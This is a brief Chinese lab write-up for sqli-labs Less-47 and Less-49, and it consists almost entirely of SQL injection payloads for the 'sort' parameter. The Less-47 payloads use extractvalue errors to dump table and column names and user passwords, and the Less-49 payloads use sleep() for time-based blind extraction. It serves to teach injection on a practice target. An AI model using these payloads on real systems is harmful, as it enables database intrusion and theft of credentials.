SQL注入 Less47(报错注入) 和Less49(时间盲注)

Less47和Less49都用不了rand()布尔盲注
因为有单引号闭合
order by 'rand()' 这条语句显然是执行不了的

Less47

?sort=1' and extractvalue(0,concat(0x7e,database()))--+

?sort=1' and extractvalue(0,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema="security")))--+

?sort=1' and extractvalue(0,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users")))--+

?sort=1' and extractvalue(0,concat(0x7e, (select group_concat(username,password) from users)))--+

Less49

?sort=1' and sleep(5)--+

?sort=1' and if(1,sleep(5),0)--+

?sort=1' and if(length(database())=8,sleep(5),0)--+

?sort=1' and if(ascii(substr(database(),1,1))=115,sleep(5),0)--+

?sort=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101,sleep(5),0)--+

?sort=1' and if(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1)='i',sleep(5),0)--+

?sort=1' and if(ascii(substr((select username from users limit 0,1),1,1))=68,sleep(5),0)--+